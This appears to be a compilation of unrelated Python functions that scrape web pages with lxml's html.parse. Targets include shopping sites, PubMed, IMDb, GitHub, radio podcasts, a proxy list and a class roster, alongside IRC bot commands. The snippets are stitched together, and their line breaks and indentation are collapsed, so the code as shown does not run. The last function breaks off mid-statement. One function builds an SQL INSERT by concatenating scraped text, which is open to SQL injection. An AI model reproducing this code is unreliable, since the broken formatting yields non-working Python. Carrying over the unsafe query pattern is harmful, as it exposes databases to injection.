def ckeck_product_status(url , f): try : doc = lh.parse(url) except: print "page unable to load ::::::::::: http://www.bizrate.com/ratings_guide/guide/ \n " try : List=doc.xpath('.//*[@id="section2"]/div/div/div/a[1]/@href') List.extend(doc.xpath('.//*[@id="section3"]/div/div/div/a[1]/@href')) List.extend(doc.xpath('.//*[@id="section4"]/div/div/div/a[1]/@href')) list_set = set(List) for element in list_set: try: p_url = 'http://aol.nextag.com'+element #p_url=p_url.replace('\'','') #p_url=p_url.replace(' ','%20') response = urllib2.urlopen(p_url) doc = lh.parse(response) p_list = doc.xpath('.//*[@id="search_results_content_id_0"]/li/div/a/@href') if len(p_list) == 0 : raise Exception except Exception: f.write(p_url+'\n') except: pass
def get_pmc_number(doc_tuple): if isinstance(doc_tuple, tuple): sim_num = doc_tuple[0] doc_file_name = DOCUMENT_FILE_NAMES[sim_num] pmc_num = '' pmc_page_title = '' try: pmc_num = TITLE_DICT[doc_file_name][0] pmc_link = 'http://www.ncbi.nlm.nih.gov/pubmed/{}'.format(pmc_num) try: pmc_page_title = pubmed_link_cache[pmc_link] except KeyError: print "didn't get from cache" t = html.parse(pmc_link) pmc_page_title = t.find(".//title").text pubmed_link_cache[pmc_link] = pmc_page_title except KeyError: return None if pmc_num == '': pmid = TITLE_DICT[doc_file_name][1] pmid_link = 'http://www.ncbi.nlm.nih.gov/pubmed/?term={}'.format(pmid) try: pmc_page_title = pubmed_link_cache[pmid_link] except KeyError: print "didn't get frmo cache" t = html.parse(pmid_link) pmc_page_title = t.find(".//title").text pubmed_link_cache[pmid_link] = pmc_page_title return pmid_link, pmc_page_title return pmc_link, pmc_page_title
def xkcdb(bot, trigger): qid = trigger.group(3) if qid: # specific quote lookup page = html.parse('http://www.xkcdb.com/%s' % qid).getroot() else: # random quote page = html.parse('http://www.xkcdb.com/random1').getroot() try: quoteblock = page.cssselect('p.quoteblock')[0] except IndexError: bot.say("XKCDB quote %snot found!" % ("#%s " % qid) if qid else "") return header = quoteblock.cssselect('span.quotehead')[0] quote = quoteblock.cssselect('span.quote')[0] for br in quote.xpath('*//br'): br.tail = '\n' + br.tail if br.tail else '\n' lines = quote.text_content().split('\n') qid = int(header.cssselect('.idlink')[0].text_content()[1:]) ratings = re.search('\(\+(?P<up>\d+)/\-(?P<down>\d+)\)', header.text_content()) up = formatting.color('+%s' % ratings.group('up'), 'green') down = formatting.color('-%s' % ratings.group('down'), 'red') url = 'http://www.xkcdb.com/%s' % qid bot.say("XKCDB quote #%s (%s/%s) - %s" % (qid, up, down, url)) if len(lines) <= 6: for line in lines: bot.say(line) else: for line in lines[:3]: bot.say(line) bot.say("[Quote truncated. Visit %s to read the rest.]" % url)
def CacheItems(): items_cache = open(CACHEFile, 'w'); try: MainMenuLinks = []; #if not os.path.exists(imagesDir): #os.makedirs(imagesDir); page = urllib2.urlopen(site_url + '/catalog'); tree = html.parse(page); root = tree.getroot(); catalog_elem = root.get_element_by_id('catalog'); #catalog_elem = catalog_elem.find_class('inner').pop(); if catalog_elem is not None: MainMenuItems = catalog_elem.find_class('menu').pop(); #print MainMenuItems; #парсим категории if (MainMenuItems is not None) and (MainMenuItems.tag == 'ul'): for MainMenuItem in MainMenuItems: for link in MainMenuItem.iterlinks(): if 'catalog' in link[2]: MainMenuLinks.append(link[2]); print 'MainMenu link:' + link[2]; #Обходим все страницы for MainMenuLink in MainMenuLinks: page_num = 1; ItemsEnded = False; First_stored = False; while not ItemsEnded: try: print 'Opening: ' + site_url + MainMenuLink + '?PAGEN_1={0}'.format(page_num); page = urllib2.urlopen(site_url + MainMenuLink + '?PAGEN_1={0}'.format(page_num), timeout = 10000); tree = html.parse(page); root = tree.getroot(); if not root.find_class('errortext'): lst = root.find_class('product-list').pop(); ItemsEnded = True; for link in lst.iterlinks(): if re.search('^/catalog/[A-Za-z_0-9]+/[A-Za-z_0-9]+/$', link[2]): if not First_stored: First_item = link[2]; First_stored = True; if (page_num != 1) and (First_item == link[2]): ItemsEnded = True; break; else: ItemsEnded = False; print 'Cached:' + link[2]; items_cache.write(link[2] +'\n'); else: ItemsEnded = True; except: print site_url + MainMenuLink + '?PAGEN_1={0}'.format(page_num) + ' is broken!!!'; page_num += 1; continue; page_num += 1; items_cache.close(); except: items_cache.close(); raise;
def fillemission(self,query=""): emissions=[] html_parser = etree.HTMLParser(encoding='utf-8', recover=True,strip_cdata=True) page= html.parse(self.url) try: expressiontitle = GenericTranslator().css_to_xpath(self.argtitle) expressionurl = GenericTranslator().css_to_xpath(self.argurl) except SelectorError: return 0 #feedparser.error('Invalid CSS selector') for e,eid in zip(page.xpath(expressiontitle),page.xpath(expressionurl)): if eid.get("href"): try: if self.name=="France culture": foundb =re.search('/podcast/(.*)', eid.get("href")).group(1) pageb = html.parse("http://www.franceculture.fr/podcast/"+foundb) aaa= pageb.xpath(GenericTranslator().css_to_xpath(".lien-rss"))[0] found = re.search("http.*rss_(.*)\.xml",aaa.get("href")).group(1) print found else: found =re.search('http.*rss_(.*)\.xml', eid.get("href")).group(1) except AttributeError: found = '' else: found="" etemp = emissionradiofrance(e.text,found) emissions.append(etemp) self.emissions=emissions
def fillemissionindb(self,query=""): self.cleardb() conn = sqlite3.connect('podcast.db') c = conn.cursor() html_parser = etree.HTMLParser(encoding='utf-8', recover=True,strip_cdata=True) page= html.parse(self.url) try: expressiontitle = GenericTranslator().css_to_xpath(self.argtitle) expressionurl = GenericTranslator().css_to_xpath(self.argurl) except SelectorError: return 0 #feedparser.error('Invalid CSS selector') for e,eid in zip(page.xpath(expressiontitle),page.xpath(expressionurl)): if eid.get("href"): try: if self.name=="France culture": foundb =re.search('/podcast/(.*)', eid.get("href")).group(1) pageb = html.parse("http://www.franceculture.fr/podcast/"+foundb) aaa= pageb.xpath(GenericTranslator().css_to_xpath(".lien-rss"))[0] found = re.search("http.*rss_(.*)\.xml",aaa.get("href")).group(1) print found else: found =re.search('http.*rss_(.*)\.xml', eid.get("href")).group(1) except AttributeError: found = '' else: found="" etemp = emissionradiofrance(e.text,found) qqq = "INSERT INTO emissions (station, title, podcasturl, idemission) VALUES (\""+self.name+"\",\""+etemp.name+"\",'"+etemp.podcasturl+"','"+str(etemp.idpod)+"')" print qqq c.execute(qqq) conn.commit() conn.close()
def listuj_linie(url): """ Funkcja wchodzi na podanego URL'a (w przypadku strony MPK, musi nast¹piæ przekierowanie, bo mamy index.jsp, a nie .html) i pobiera listê linii. TODO: rozró¿niaæ autobusy dzienne/nocne i tramwaje? Na tej podstronie jest taka mo¿liwoœæ. """ tree = html.parse(url+'/index.html') przekierowanie = tree.xpath('//meta [@http-equiv="refresh"]') if przekierowanie: #Wybierz pierwszy element z tej tablicy i weŸ tekst na #prawo od URL w jego 'content'. nowy_url = przekierowanie[0].attrib['content'].split( 'URL=')[-1] tree = html.parse(nowy_url) linie_tree = wybierz_ramke(tree,'rozklad',url) linie_td = linie_tree.xpath('//div [contains(@id,bx1)]//td \ [@class="nagl" and not(contains( \ .,"Aktualny"))]') ret = [] makedir_quiet('przetworzone') f = open('przetworzone/lista_linii.txt','w') for linia in linie_td: link = linia.xpath('a')[0] #wytnij "Linia: " z linka i uznaj to za nazwê linii nazwa_linii = link.text_content().lstrip("Linia: ") url_linii = url+link.attrib['href'] ret += [Linia(nazwa_linii,url_linii,url)] print(nazwa_linii,file=f) return ret
def get_article(url): ## Section 0 - Initial set. blog_url = list() dem = list() ## Section 1 - Got frame src. dem.append(html.parse(url).getroot()) blog_url.append("http://blog.daum.net" + dem[0][1][0].attrib["src"]) # print "[System] Got blog-url[1] from iframe successfully. :", blog_url[0] ## Section 2 - Get frame src(2). dem.append(html.parse(blog_url[0]).getroot()) frames = dem[1].cssselect("iframe") for frame in frames: if "if_b" in frame.get("name"): blog_url.append("http://blog.daum.net" + frame.get("src")) # print "[System] Got blog-url[2] from iframe successfully. :", blog_url[1] ## Section 3 - Get contents of article. dem.append(html.parse(blog_url[1]).getroot()) article = dem[2].cssselect("div#contentDiv")[0] img_links = get_images(article) ## Section 4 - Return data. return st.strip_html(html.tostring(article, encoding="utf-8", method="html")), img_links
def _get_tree_from_url(self, url): if not url: return if url.startswith('/'): url = "http://www.redbus.in" + url # print url , " in _get_tree_from_url" urlstr = url.replace('/', '_') try: # print "\nIn Try (_get_tree_from_url)" f = open("dump/%s" % urlstr, 'r') doc = html.fromstring(f.read()) tree = etree.ElementTree(doc) print 'Found' except: # print "\nIn Except (_get_tree_from_url)" print "Error:", sys.exc_info()[0] # print 'Downloading' tree = html.parse(url) # print "Tree :- " , tree if not tree: print "\nFalling back" tree = html.parse(url) output = open("dump/%s" % urlstr, 'w') output.write(html.tostring(tree)) output.close() return tree
def get_poster(self, download=True, force=False): imdb_id = self.movie_imdb_id genre = list() if self.has_poster() and not force: return os.path.join(R_POSTERS_PATH, str(imdb_id)+'.jpg') second_page = parse(self.__create_request(movie_url(imdb_id))) if second_page: try: poster_page_url = second_page.xpath("//td[@id='img_primary']/a")[0].attrib.get('href') except IndexError: poster_page_url = None poster_url = None if poster_page_url is not None: poster_page = parse(self.__create_request('http://www.imdb.com'+poster_page_url)) try: poster_url = poster_page.xpath("//div[@id='photo-container']/div[@id='canvas']//img[@id='primary-img']")[0].attrib.get('src') except IndexError: poster_url = None if poster_url and download: print poster_url try: f = self.__create_request(poster_url) except: pass else: path = os.path.join(POSTERS_PATH, str(imdb_id)+'.jpg') with open(path, 'w') as local: local.write(f.read()) poster_url = os.path.join(R_POSTERS_PATH, str(imdb_id)+'.jpg') if poster_url is None: poster_url = UNKNOWN_POSTER_PATH return poster_url
def scrapeGit(): lst = [] nextPage = 'https://github.com/showcases' curr = 1 last = 0; while(curr > last): url = urlopen(nextPage) tree = parse(url) #Gets a list of categories on the page page = tree.xpath('//*[@id="site-container"]/div[2]/ul//li/a/@href') #Goes through each category and gets the repo titles and descriptions for i in range(0, 2): time.sleep(3) url = urlopen('https://github.com' + page[i]) tree2 = parse(url) title = tree2.xpath('//*[@id="site-container"]/div[2]/div[2]/div/div[1]/ul[2]//li/h3/a/@href') des = tree2.xpath('//*[@id="site-container"]/div[2]/div[2]/div/div[1]/ul[2]//li/p/text()') for x in range(0, len(title)-1): newTitle = '' for j in reversed(title[x]): if j == '/': break else: newTitle = j + newTitle newDes = des[x].strip().replace('\n', '') " ".join(newDes.split()) link = 'github.com'+ title[x] source = 'GIT' newProj = project(newTitle, newDes, link, "", source) lst += [newProj] nextPage = tree.xpath('//*[@id="site-container"]/div[2]/div[3]/div/a[last()]/@href')[0] last += 1 curr = int(nextPage[-1]) return lst
def fetch_ipeen_info(url): root = parse(_IPEEN_BASE_URL + url).getroot() # get basic information info_rows = root.xpath('//table[@class="binfo"]/tr/td/div') basic_info_list = [_remove_space(row.text_content()) for row in info_rows] # get comments comment_links = root.xpath('//h2[@class="absTitle"]/a') comment_list = _extract_links(comment_links) # get more shops path = './/div[@class="name"]/a' shop_blocks = root.xpath('//div[@class="sblock rec"]') shop_list = { 'rel': _extract_links(shop_blocks[0].iterfind(path)), 'near': _extract_links(shop_blocks[1].iterfind(path)) } # get photos url = url.replace('/shop/','/shop/photos/') root = parse(_IPEEN_BASE_URL + url).getroot() photo_imgs = root.xpath('//a[@rel="shop_photos_share"]/img') photo_list = ['http:' + img.get('src') for img in photo_imgs] # wrap infomation info = { 'basic_info': basic_info_list, 'comments': comment_list, 'more_shop': shop_list, 'photos': photo_list } return info
def get_apocopes(list_urls): apo_urls = [] for list_url in list_urls: for node in parse(list_url).findall('.//div[@class="mw-category"].//li/a[@href]'): apo_urls.append((node.text, 'http://fr.wiktionary.org' + node.attrib['href'])) with codecs.open('wiki.log', 'w', 'utf-8') as log: apos = {} for short, url in sorted(apo_urls): short = short.lower() if short not in apos: apos[short] = [] fulls = apos[short] for node in parse(url).findall('.//dl/dd'): #/i/a[@href] text = etree.tostring(node, encoding = 'unicode', method = "text").lower().replace('\n', '') fulls_sub = [] for match in extractor.findall(text): for full in match: full = cleaner.sub('\\1', full) if not full: continue fulls_sub.append(full) log.write(delim.join([short, str(fulls_sub), text]) + newline) if not fulls_sub: print short, '=>', text continue for full in fulls_sub: if full not in fulls: fulls.append(full) return apos
def replace_terms(html): html = force_text(html) remove_body = False remove_p = False etree = parse(StringIO(html)) root_node = etree.getroot() if not _looks_like_full_html_unicode(html): root_node = root_node.getchildren()[0] remove_body = True if root_node.getchildren()[0].tag == 'p' and html[:3] != '<p>': remove_p = True variants_dict = Term.objects.variants_dict() replace_dict = Term.objects.replace_dict() replace_regexp = Term.objects.replace_regexp() replace_regexp__sub = replace_regexp.sub translate = get_translate_function(replace_dict, variants_dict) for node in get_interesting_contents(root_node, replace_regexp): new_content = replace_regexp__sub( translate, tostring(node, encoding='unicode')) new_node = parse(StringIO(new_content)).getroot().getchildren()[0] if node.tag != 'body': new_node = new_node.getchildren()[0] node.getparent().replace(node, new_node) if remove_body: if remove_p: root_node = root_node.getchildren()[0] out = root_node.text or '' out += ''.join([tostring(node, encoding='unicode') for node in root_node.getchildren()]) return out return tostring(etree, encoding='unicode')
def fetch_or_load(spec_path): """ Fetch a new specification or use the cache if it's current. :argument cache_path: the path to a cached specification """ headers = {} try: modified = datetime.utcfromtimestamp(os.path.getmtime(spec_path)) date = modified.strftime("%a, %d %b %Y %I:%M:%S UTC") headers["If-Modified-Since"] = date except OSError as error: if error.errno != errno.ENOENT: raise request = urllib.Request(VALIDATION_SPEC, headers=headers) response = urllib.urlopen(request) if response.code == 200: with open(spec_path, "w+b") as spec: spec.writelines(response) spec.seek(0) return html.parse(spec) with open(spec_path) as spec: return html.parse(spec)
def get_poster(self): movie_title = self.movie_title page_search_list = parse(urllib2.urlopen('http://movieposterdb.com/browse/search?'+urllib.urlencode({'type':'movies', 'query': movie_title}))) page_movie_gallery = page_search_list.xpath('//tr/td/b/a')[0].attrib.get('href') movie_poster_gallery = parse(urllib2.urlopen(page_movie_gallery)) movie_poster = movie_poster_gallery.xpath('//tr/td/div/a/img')[0].attrib.get('src') return dict(poster=movie_poster)
def get_index(): """ Traverse the search results of an empty query for projects in the CORDIS database. """ # fetch an initial page: doc = html.parse(INITIAL_URL) # infinite loop isn't nice, but we'll break when no 'next' link is # available. while True: # iterate over the links for all projects on this page for project_link in doc.findall('//div[@id="PResults"]//a'): # join up URLs to generate the proper path href = project_link.get('href').replace('..', '') yield urljoin(INITIAL_URL, href) next_url = None # look at all links in the navigation section of the listing for nav in doc.findall('//p[@class="PNav"]/a'): # if the link is a 'next' link, follow it if 'Next' in nav.text: href = nav.get('href').replace('..','') next_url = urljoin(INITIAL_URL, href) # replace the document to traverse the next page in # the following iteration doc = html.parse(next_url) # no next link was found, so cancel if not next_url: break
def identify_and_get_right_url(url): tree = html.parse(url).getroot() is_problem_statement_string = tree.xpath('/html/body/table/tr/td[3]/table[1]/tr/td[3]/span/text()')[0].strip(' \t\n\r') # check if its a Problem statement page that is passed if re.search(r'Problem Statement', is_problem_statement_string): problem_detail_url = tree.xpath('/html/body/table/tr/td[3]/table[2]/tr[1]/td/table/tr[10]/td/a/@href')[0].strip(' \t\n\r') url = 'http://community.topcoder.com' + problem_detail_url print 'Given url is a problem statement url, trying to get a problem detailed url out of it' if check_is_url(url): print 'Extracted problem detailed page url = ', url return url else: print "ERROR: couldn't find problem detailed page url. Exiting!" sys.exit(1) # check if its a Problem detail page url tree = html.parse(url).getroot() is_problem_detail_string = tree.xpath('/html/body/table/tr/td[3]/table/tr/td[3]/span/text()')[0].strip(' \t\n\r') if re.search(r'Problem Detail', is_problem_detail_string): print 'Given url is a problem detail url' return url print "ERROR: Doesn't look like a topcoder url" sys.exit(1)
def get_sentence_xpath_tuples(url, xpath_to_text=TEXT_FINDER_XPATH): """ Given a url and xpath, this function will download, parse, then iterate though queried text-nodes. From the resulting text-nodes, extract a list of (text, exact-xpath) tuples. """ try: parsed_html = html.parse(url) except IOError as e: # use requests as a workaround for problems in some # sites requiring cookies like nytimes.com # http://stackoverflow.com/questions/15148376/urllib2-returning-no-html page = requests.get(url) # http://lxml.de/parsing.html parsed_html = html.parse(BytesIO(page.content), html.HTMLParser()) xpath_finder = parsed_html.getroot().getroottree().getpath nodes_with_text = parsed_html.xpath(xpath_to_text) sent_xpath_pairs = [ ('\n\n' + s, xpath_finder(n)) if e == 0 # hard-code paragraph breaks (there has to be a better way) else (s, xpath_finder(n)) for n in nodes_with_text for e, s in enumerate(sentence_token_pattern.split(bracket_pattern.sub('', ''.join(n.xpath('.//text()'))))) if s.endswith(tuple(sentence_ending)) ] return sent_xpath_pairs
def imdb(ircbot, input): origterm = input.groups()[1] if not origterm: return ircbot.say('Perhaps you meant ".wik Zen"?') origterm = origterm.encode('utf-8') doc = parse("http://m.imdb.com/find?q=" + urllib.quote(origterm)); try: first_result = doc.xpath("/html/body/section/div/div/div")[0]; movie_name = first_result.text_content().strip(); movie_url = first_result.xpath("a")[0].get("href"); except: return ircbot.say("No result"); re_uri = re.compile("\/title\/tt[0-9]*\/"); if re_uri.match(movie_url): doc = parse("http://m.imdb.com" + movie_url).getroot(); details = doc.cssselect("section.details")[0]; for i in details.xpath('div/h1'): if i.text == "Genre": genre = i.getnext().text; try: rating = doc.xpath("/html/body/section/a/p/strong")[0].text; #Unreleased movies have no rating except: rating = ""; else: return ircbot.say("No result"); return ircbot.say(movie_name + " - " + genre + " - " + rating + "/10 - http://imdb.com" + movie_url); ircbot.say(movie_name + " " + movie_url);
def get_sentence_xpath_tuples(url, xpath_to_text = TEXT_FINDER_XPATH): """ Given a url and xpath, this function will download, parse, then iterate though queried text-nodes. From the resulting text-nodes, extract a list of (text, exact-xpath) tuples. """ try: parsed_html = html.parse(url) except IOError as e: # workaround for problems in some sites requiring cookies # like nytimes.com # http://stackoverflow.com/questions/15148376/urllib2-returning-no-html import requests page = requests.get(url) try: from cStringIO import StringIO as BytesIO except ImportError: from io import BytesIO # http://lxml.de/parsing.html parsed_html = html.parse( BytesIO(page.content), html.HTMLParser() ) xpath_finder = parsed_html.getroot().getroottree().getpath nodes_with_text = parsed_html.xpath(xpath_to_text) sent_xpath_pairs = [(s, xpath_finder(n)) for n in nodes_with_text for s in sentence_token_pattern_C.split( bracket_pattern.sub( '', ''.join( n.xpath( './/text()') ) ) ) if s.endswith('.')] return sent_xpath_pairs
def parse(self, url): page = html.parse(url) dates = page.xpath(self.regex_date) exhibitions = page.xpath(self.regex_event) for date in dates: dprint("Date: %s" % date.text) events_list = [] for exhibition in exhibitions: dprint("=" * 20) dprint("Exhibition name: %s" % exhibition.text) dprint("Additional info: %s" % exhibition.attrib['href']) url_decription = exhibition.attrib['href'] page_additional_info = html.parse(url_decription) event_description = "Пусто" try: event_description = page_additional_info.xpath(self.regex_event_description).pop().text except Exception: pass dprint("Description: %s" % event_description) event_address = page_additional_info.xpath(self.regex_address).pop().text event_date = page_additional_info.xpath(self.regex_date).pop().text dprint("Address: %s" % event_address) dprint("Date: %s" % event_date) event = Event(description=event_description, address=event_address, date=event_date) events_list.append(event) return events_list
def _get(self): h = html.parse(self.URL).getroot() h.make_links_absolute(self.URL) urls = set( re.sub('-(\d)\.', '-0\\1.', e.get('href')) for e in h.cssselect('.page') ) for url in urls: h = html.parse(url).getroot() h.make_links_absolute(self.URL) h.cssselect('#advcenter')[0].getparent().drop_tree() entries = h.cssselect('#proxylist tr:nth-child(n+2)') data_url = h.cssselect('#ipportonly > a')[0].get('href') h = html.parse(data_url).getroot() data = h.cssselect('#content pre')[0].text for i, line in enumerate(data.splitlines()): ip, port = line.split(':') yield Proxy( ip, port, country=entries[i][3].text, anonlevel=entries[i][1].text, source=self.__class__.__name__ )
def scraper(url, package, tmp): """find and validate source tar.gz with md5 and pgp signatures searches for links to the 'package' on the 'url', downloads the .tar.gz, .tar.gz.md5, and .tar.gz.asc uses the .tar.gz.md5 and the .tar.gz.asc to validate the .tar.gz returns the path to the .tar.gz file inside of 'tmp' """ # print "%s %s" % ( url, package ) doc = parse(urlopen(url)).getroot() doc.make_links_absolute(url) links = doc.xpath("//a[contains(@href,'%s')]/@href" % package, ) download_url = [i for i in links if i.endswith('.tar.gz')][0] # sometimes the download link does not let you download if download_url.startswith('http://www.apache.org/dyn/closer.cgi'): doc2 = parse(urlopen(download_url)).getroot() download_url = doc2.xpath("//a[contains(@href,'%s')][1]/@href" % package, )[0] # pp(download_url) archive = downloadChunks( download_url , tmp) md5_file = downloadChunks( [i for i in links if i.endswith('tar.gz.md5')][0], tmp) checksum = md5sum(archive) # make sure the checksum is correct print checksum assert(checksum in open(md5_file).read()) pgp_file = downloadChunks( [i for i in links if i.endswith('tar.gz.asc')][0], tmp) subprocess.check_call(["gpg", "--verify", pgp_file, archive ]) return archive
def scrape_thread(thread): print base+"/community/pr.aspx"+thread.attrib["href"][23:] title = thread.text qid = re.findall('\d*$', thread.attrib['href'])[0] t = html.parse(base+"/community/pr.aspx"+thread.attrib["href"][23:]) for br in t.xpath("*//br"): br.tail = "\n" + br.tail if br.tail else "\n" no_signatures = re.sub('<hr.*?/td>', "", etree.tostring(t), flags=re.DOTALL) meta = t.xpath('//td[@class="printHead"]') posters = set() post_content = html.parse(StringIO(no_signatures)).xpath('//td[@class="printBody"]')[1:] for i, post in enumerate(zip(meta, post_content)): inferred_replies = set() local_id = i - 1 reply_to = qid + "_top" if local_id >= 0 else " " poster = post[0].xpath('b')[0].text date = post[0].xpath('b')[0].tail[3:] content = post[1].text_content() unique_id = qid + "_top" if local_id < 0 else qid + "_" + str(local_id) for p in posters: if p in content: inferred_replies.add(p) row = [unique_id, qid, local_id, title, poster, date, reply_to, content, ' | '.join(inferred_replies), subforum] w.writerow(row) f.flush() posters.add(poster)
def find_path() : html_file = "ETOZGianfranco.html" input_string = "Gianfranco Frattini" elem_tree = lh.parse(html_file) xpath = "//*[contains(normalize-space(.), '{0}') and not(.//*[contains(normalize-space(.), '{0}')])]/*" node = elem_tree.xpath(xpath.format(input_string))[0] path = elem_tree.getpath(node) #Use parent path path = path[:path.rfind('/')] #Use template result = elem_tree.xpath(path)[0] result_html = tostring(result) result_class = result.attrib.get('class') print '{0} -> {1}'.format(input_string, elem_tree.getpath(node)) #Use template html_file2 = "ETOZCocktail.html" elem_tree2 = lh.parse(html_file2) result2 = elem_tree2.xpath(path)[0] result2_html = tostring(result2) #Create dao dao = Dao() #Update template dao.update_path(19, path) #Insert record dao.insert_record('TestUrl', result_html, 19) dao.insert_record('TestUrl', result2_html, 19)
def grabinfo(self, url): try: company = html.parse(url) except Exception: print('Bad URL: ', url) return ['Bad URL', '---', '---', '---', '---', url] offices = company.xpath("//div[@class='offices']/text()") if len(offices) > 0 and self.city['ru'] in offices[0]: # self.city['ru'].decode('utf-8') in Python 2.7 offices = offices[0].strip() else: return None companyname = company.xpath("//h1[@class='g-h2']/text()")[0].strip() staff = company.xpath("//div[@class='company-info']/text()") if len(staff) > 0: staff = max([el.strip() for el in staff]) else: staff = '' site = company.xpath("//div[@class='site']/a/@href") if len(site) > 0: site = site[0] else: site = '' companyoffice = html.parse(url+'offices/') adress = companyoffice.xpath("//a[@name='"+self.city['en']+"']/../div/div[2]/div[1]/div/div[1]/text()") if len(adress) > 0: adress = adress[0].strip() else: adress = '' return [companyname, staff, offices, adress, site, url]
def load_page(username): try: page = html.parse('html/%s.htm' % username) except: load_html(username) page = html.parse('html/%s.htm' % username) return page.getroot()
def main(): url = 'http://www.onekp.com/public_data.html' html = 'public.html' handle = open('result.tsv', 'w') if not exists(html): raw = parse(url) else: raw = parse(html) # /html/body/table/tr/td/self|b|a.href all_tr = raw.xpath('//tr') for tr in all_tr: all_td = tr.findall('td') for td in all_td: # some <td> have descdents, get a.href for i in td.iter(): if i.tag == 'a': handle.write(i.attrib['href']) break elif i.tag == 'td': handle.write(i.text_content()+' ') else: pass handle.write('\t') handle.write('\n') handle.close() print('Done')
def getPages(manga, chapter): url = URI + '/' + manga + '/' + chapter + '/' root = html.parse(url) soup = root.xpath('//li') url = URI + soup[0][0].get('href') root = html.parse(url) pages = root.xpath('//select[@class="page-select"]') return [page.text for page in pages[0].getchildren()]
import urllib from HTMLParser import HTMLParser from lxml.html import parse urltext = [] class myHTMLParser(HTMLParser): def handle_data(self, data): if data != '\n': urltext.append(data) if __name__ == '__main__': fileParser = myHTMLParser() testUrl = "http://www.shopping.com/products?KW=<keword>" parsedURL = parse(testUrl) doc = parsedURL.getroot() links = doc.findall('.//a') linksSet = [] for entry in links: linksSet.append(entry.get('href')) for entry in linksSet: print entry #pageHandle = urllib.urlopen(testUrl).read() #print pageHandle+"\n\n" #fileParser.feed(pageHandle) #fileParser.close() #print urltext
def get_lxml_elements(url, element): _skip_if_no('lxml') from lxml.html import parse doc = parse(url) return doc.xpath('.//{0}'.format(element))
# -*- coding: UTF-8 -*- from lxml import html import os import sys reload(sys) sys.setdefaultencoding('utf-8') seed_url = u"http://www.kekenet.com/read/essay/ats/" x = html.parse(seed_url) spans = x.xpath("*//ul[@id='menu-list']//li/h2/a") for span in spans[:10]: details_url = span.xpath("attribute::href")[0] xx = html.parse(details_url) name = 'story//' + span.text.replace(u' ', u'_') f = open(name, 'a') try: contents = xx.xpath("//div[@id='article']//p/text()") for content in contents: if len(str(content)) > 1: f.write(content.encode('utf-8') + '\n') except Exception, e: print "wrong!!!!", e f.close() os.remove(name) else: f.close()
import datetime import sys links = [] class MyHTMLParser(HTMLParser): def handle_starttag(self, tag, attributes): if tag == 'a': for name, value in attributes: if name == 'routerlink': links.append(value) parser = MyHTMLParser() tree = html.parse('src/app/app.component.html') parser.feed(html.tostring(tree).decode("utf-8")) parser.close() # prune /home since it's a duplicate of base url links.remove('/home') base_url = 'https://www.egill.rocks' missing_links = links.copy() tree = ET.parse('deploy/sitemap.xml') root = tree.getroot() url_el = list(root) for el in url_el: for link in links: # assume sub-element 'loc' is the first one in the order if el[0].text == base_url + link:
def html_parse(site_string): # tmp = lhtml.parse(url_string) site = lhtml.parse(StringIO(site_string)) cleaner = Cleaner(style=True, links=True, add_nofollow=True, page_structure=False, safe_attrs_only=False) html = cleaner.clean_html(site) body = html.getroot().cssselect('body')[0] for ele in body.cssselect('.header'): ele.drop_tree() for ele in body.cssselect('#header'): ele.drop_tree() for ele in body.cssselect(".ui-toolkit"): ele.drop_tree() for ele in body.cssselect('#footer'): ele.drop_tree() for ele in body.cssselect('nav'): ele.drop_tree() #goSquared for ele in body.cssselect('.navOffset'): ele.drop_tree() #exoscale for ele in body.cssselect('hgroup'): ele.drop_tree() #vircurex for ele in body.cssselect('.banner'): ele.drop_tree() #tyntec for ele in body.cssselect('.bar'): ele.drop_tree() #1linx for ele in body.cssselect('section'): ele.drop_tag() #one signal for ele in body.cssselect('#hub-header'): ele.drop_tree() for ele in body.cssselect('header'): ele.drop_tag() #clever tap for ele in body.cssselect('.doc-article__breadcrumb'): ele.drop_tree() for ele in body.iter(): if 'div' == ele.tag: ele.drop_tag() if len(body.cssselect('h1')) > 0: for ele in body.cssselect('h1'): body = ele.getparent() break elif len(body.cssselect('h2')) > 0: for ele in body.cssselect('h2'): body = ele.getparent() break elif len(body.cssselect('h3')) > 0: for ele in body.cssselect('h3'): body = ele.getparent() break elif len(body.cssselect('h4')) > 0: for ele in body.cssselect('h4'): body = ele.getparent() break elif len(body.cssselect('h5')) > 0: for ele in body.cssselect('h5'): body = ele.getparent() break elif len(body.cssselect('h6')) > 0: for ele in body.cssselect('h6'): body = ele.getparent() break fo = open("what.txt", "w+") fo.write(lhtml.tostring(body)) return body
def run(self, content, no_lectures=False, no_exercises=False, class_code=None): doc = parse(StringIO(content)).getroot() subject = Subject.objects.get(abbr=self.parse_subject(doc)) year, is_winter = self.parse_semester(doc) semester = Semester.objects.get(year=year, winter=is_winter) classes = list( map(str.strip, doc.xpath('//tr[@class="rowClass1"]/th/div/span[1]/text()'))) labels = list(doc.xpath('//tr[@class="rowClass1"]/th/div/@title')) default_classes = [] for code in class_code or []: try: default_classes.append( Class.objects.get(semester__year=year, semester__winter=is_winter, code=code, subject__abbr=opts['subject'])) except Class.DoesNotExist: raise ImportException( f"Class with code {code} does not exist.") class_in_db = {} for c, label in zip(classes, labels): if not self.is_allowed(c, no_lectures, no_exercises): continue try: class_in_db[c] = Class.objects.get(code=c, semester=semester, subject=subject) except Class.DoesNotExist: s = label.split(' ') class_in_db[c] = Class() class_in_db[c].code = c class_in_db[c].day = s[6].upper() class_in_db[c].hour = s[7] class_in_db[c].year = datetime.datetime.now().year class_in_db[c].winter = datetime.datetime.now().month >= 9 class_in_db[c].time = s[7] class_in_db[c].subject = subject class_in_db[c].semester = semester first_name, last_name = label.replace(',', '').replace( 'Ph.D.', '').replace('Bc', '').replace('DiS', '').strip().split(' ')[-2:] if first_name and last_name: teacher = User.objects.filter(first_name=first_name, last_name=last_name) if not teacher: raise ImportException( f"Teacher '{first_name}' '{last_name}' not found") class_in_db[c].teacher = teacher[0] class_in_db[c].save() for row in doc.xpath('//table[@class="dataTable"]//tr')[1:]: def clean_name(s): for remove in [ 'Ing', 'Bc', 'BA', 'MBA', 'Mgr', 'MgrA', '.', ',' ]: s = s.replace(remove, '') return ' '.join(s.split()).strip() login = row.xpath('./td[2]/a/text()')[0].strip() email = row.xpath('./td[2]/a/@href')[0].replace('mailto:', '').strip() name = clean_name(row.xpath('./td[3]/a/text()')[0]) lastname, firstname = name.strip().split(' ', 1) member_of = [] created = False user = None try: user = User.objects.get(username=login) except User.DoesNotExist: user = User.objects.create_user(login.upper(), email) user.first_name = firstname user.last_name = lastname user.save() created = True for i, el in enumerate(row.xpath('.//input')): clazz = classes[i] if "checked" in el.attrib: if not self.is_allowed(clazz, no_lectures, no_exercises): continue if user not in class_in_db[clazz].students.all(): member_of.append(clazz) class_in_db[clazz].students.add(user) elif clazz 